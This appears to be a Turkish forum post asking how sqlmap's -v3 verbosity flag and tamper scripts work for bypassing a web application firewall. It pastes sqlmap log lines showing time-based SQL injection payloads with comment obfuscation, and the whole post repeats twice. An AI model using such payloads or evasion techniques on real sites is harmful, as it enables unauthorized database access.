- 21 Haz 2021
- 147
- 27
- 23
arkdaşlar merhaba
sqlmap ıle waf bypaas etmeyı arastırdım bır vıdeoda şöyle kullanılıyodu -v3 --tamper='...vs...'
baştaki -v3 neyi temsil eder bunuda arstırdım fakat mantıklı bır acıklama bulamadım
aynı zamanda -v3 ekledıkten sonra
[PAYLOAD] 1)/*!0AND SLEEP(5)-- BOJk
[23:52:11] [PAYLOAD] 1)/*!0AND SLEEP(5)/*!0AND (7953=7953
[23:52:11] [PAYLOAD] 1))/*!0AND SLEEP(5)/*!0AND ((5504=5504
[23:52:11] [PAYLOAD] 1)))/*!0AND SLEEP(5)/*!0AND (((1058=1058
[23:52:12] [PAYLOAD] 1/*!0AND SLEEP(5)
şu şekilde taramaya devam ediyor
-v3 eklemden --tamper='..vs..' dedikten sonra ise bu şekilde taramaya devam ediyor
[INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[23:52:49] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[23:52:50] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[23:52:56] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[23:53:00] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - S
uzun lafın kısası tamper sc nasıl kullanılır nelere dıkkat etmem gerekir ve -v3 ne işe yarar
sqlmap ıle waf bypaas etmeyı arastırdım bır vıdeoda şöyle kullanılıyodu -v3 --tamper='...vs...'
baştaki -v3 neyi temsil eder bunuda arstırdım fakat mantıklı bır acıklama bulamadım
aynı zamanda -v3 ekledıkten sonra
[PAYLOAD] 1)/*!0AND SLEEP(5)-- BOJk
[23:52:11] [PAYLOAD] 1)/*!0AND SLEEP(5)/*!0AND (7953=7953
[23:52:11] [PAYLOAD] 1))/*!0AND SLEEP(5)/*!0AND ((5504=5504
[23:52:11] [PAYLOAD] 1)))/*!0AND SLEEP(5)/*!0AND (((1058=1058
[23:52:12] [PAYLOAD] 1/*!0AND SLEEP(5)
şu şekilde taramaya devam ediyor
-v3 eklemden --tamper='..vs..' dedikten sonra ise bu şekilde taramaya devam ediyor
[INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause'
[23:52:49] [INFO] testing 'Oracle boolean-based blind - ORDER BY, GROUP BY clause'
[23:52:50] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[23:52:56] [INFO] testing 'PostgreSQL boolean-based blind - Stacked queries'
[23:53:00] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - S
uzun lafın kısası tamper sc nasıl kullanılır nelere dıkkat etmem gerekir ve -v3 ne işe yarar